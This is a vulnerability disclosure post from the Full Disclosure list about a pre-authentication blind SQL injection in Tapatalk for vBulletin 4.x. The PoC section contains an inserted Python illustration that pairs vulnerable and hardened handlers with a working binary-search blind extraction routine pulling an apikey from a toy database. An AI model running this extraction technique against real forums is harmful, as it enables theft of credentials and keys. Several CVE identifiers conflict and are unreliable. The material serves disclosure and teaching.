Message-ID: <001f01cfe726$59d09890$0d71c9b0$@oststrom.com>
Date: Mon, 13 Oct 2014 22:43:16 +0200
From: "oststrom \(public\)" <pub@...strom.com>
To: <fulldisclosure@...lists.org>
Subject: [FD] CVE-2014-2023 - Tapatalk for vBulletin 4.x - multiple blind sql injection (pre-auth)
*Preliminary VulnNote*
 
CVE-2014-2023 - Tapatalk for vBulletin 4.x - multiple blind SQL injection (pre-auth)
====================================================================================
 
Overview
--------
 
    date    :  2014-10-12
    cvss    :  7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) base (CVSSv2)
    cwe     :  89 (SQL injection)

    vendor  :  Tapatalk Inc
    product :  Tapatalk for vBulletin 4.x
    versions affected:  latest (to date)
                        5.2.1 (verified)
                        4.9.0 (verified)

    exploitability :
                * remotely exploitable
                * NO authentication required
                * NO user interaction required
                * NO special configuration required (default settings)
                
Abstract
--------
    Tapatalk for vBulletin 4.x does not properly sanitize the parameters of
    some XML-RPC calls, allowing unauthenticated remote users to inject
    arbitrary SQL into the queries built from them.

    risk: high

    !! Note !! - this is a preliminary VulnNote. The full PoC / description
    will be made available within the next 7 days (see contact) to allow
    Mobiquo to fix this.

    googledork: see PoC code
 
 
Details
--------
    
    vulnerable component:
        * stripped // see full VulnNote - (contact)

    The XML-RPC request is decoded and the decoded, attacker-supplied
    parameter values are used directly in an SQL query, so a parameter that
    contains SQL becomes part of the executed statement. The response only
    reveals whether the query matched (blind injection), so data has to be
    extracted through true/false conditions.
 
 
Proof of Concept (PoC)
----------------------
 
    see https://github.com/tintinweb/pub/cve-2013-2023
    
    
    1) prerequisites
         vBulletin 4.x with Tapatalk for vBulletin 4.x installed
    2) run PoC
         edit the PoC to match your TARGET (optionally set DEBUG=True)
         (optionally) edit the query to extract specific database values
         Note: the PoC will try to detect Tapatalk on that host first
         run the PoC

    by default the PoC extracts
    * the MySQL root password hash (if the vBulletin db user has the
      privileges to read the mysql system tables)
    * vBulletin db record fields (apikey) - chains perfectly with
      CVE-2014-2023

    extraction is limited only by the vBulletin db user's access permissions
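    The following is an added illustration, not the advisory's PoC and not
    Tapatalk's or vBulletin's code (which are PHP). It models in Python the
    bug class described under Details (a decoded XML-RPC parameter spliced
    straight into SQL) next to a hardened variant that type-checks and binds
    the parameter, and drives the vulnerable variant with the kind of
    boolean-based blind extraction the PoC section describes. An in-memory
    SQLite database stands in for the MySQL backend, so SQLite's unicode()
    takes the role MySQL's ASCII() would play; the method name `get_forum`,
    the `setting`/`forum` tables and the apikey value are all constructed
    assumptions.

```python
# Added illustration of the advisory's bug class; not Tapatalk/vBulletin code.
# Method name, table layout and the apikey value below are assumptions.
import sqlite3
import xmlrpc.client

SAMPLE_APIKEY = "1f9a2c7e4b3d8e56"   # constructed sample secret
APIKEY_SUBQUERY = "SELECT value FROM setting WHERE varname = 'apikey'"


def make_db():
    """Constructed stand-in for the forum database (MySQL in the real product)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE setting (varname TEXT, value TEXT)")
    conn.execute("INSERT INTO setting VALUES ('apikey', ?)", (SAMPLE_APIKEY,))
    conn.execute("CREATE TABLE forum (forumid INTEGER, title TEXT)")
    conn.execute("INSERT INTO forum VALUES (1, 'General')")
    conn.commit()
    return conn


def rpc_request(forum_id):
    """Build the <methodCall> an XML-RPC client would send (method name assumed)."""
    return xmlrpc.client.dumps((forum_id,), methodname="get_forum")


def get_forum_vulnerable(conn, xml_request):
    """Decodes the request and splices the parameter straight into the SQL text."""
    (forum_id,), _method = xmlrpc.client.loads(xml_request)
    # VULNERABLE: the decoded string becomes part of the statement
    row = conn.execute(f"SELECT title FROM forum WHERE forumid = {forum_id}").fetchone()
    return row[0] if row else None


def get_forum_hardened(conn, xml_request):
    """Same method with the parameter type-checked and bound as data."""
    (forum_id,), _method = xmlrpc.client.loads(xml_request)
    try:
        fid = int(forum_id)            # reject anything but an integer literal
    except (TypeError, ValueError):
        return None
    row = conn.execute("SELECT title FROM forum WHERE forumid = ?", (fid,)).fetchone()
    return row[0] if row else None


def make_oracle(handler, conn):
    """The only signal a blind attacker gets: did the call return a row or not."""
    def oracle(condition):
        return handler(conn, rpc_request(f"1 AND ({condition})")) is not None
    return oracle


def blind_extract(oracle, subquery, max_len=64):
    """Recover a string one yes/no question at a time (binary search per value)."""
    lo, hi = 0, max_len                       # first find the length
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length(({subquery})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    chars = []
    for pos in range(1, length + 1):          # then each printable ASCII character
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


def run_demo():
    """Legitimate call against both handlers, then blind extraction against both."""
    conn = make_db()
    return {
        "legit_vulnerable": get_forum_vulnerable(conn, rpc_request("1")),
        "legit_hardened": get_forum_hardened(conn, rpc_request("1")),
        "leak_vulnerable": blind_extract(make_oracle(get_forum_vulnerable, conn), APIKEY_SUBQUERY),
        "leak_hardened": blind_extract(make_oracle(get_forum_hardened, conn), APIKEY_SUBQUERY),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value!r}")
```

    Both handlers answer the legitimate request identically; only the
    vulnerable one leaks the apikey, roughly seven oracle queries per
    character, while the hardened one refuses the payload before any SQL
    runs. In PHP the equivalent fix is intval() on numeric parameters and
    prepared statements or proper escaping for the rest.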
    
    
Timeline
--------
 
    2014-01-14: initial vendor contact, no response
    2014-02-24: vendor contact, no response
    2014-10-13: public disclosure
    
Contact
--------
    tintinweb - https://github.com/tintinweb/pub/cve-2013-2023
    
    
    PGP key ID: 0x721427D8
    
    
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/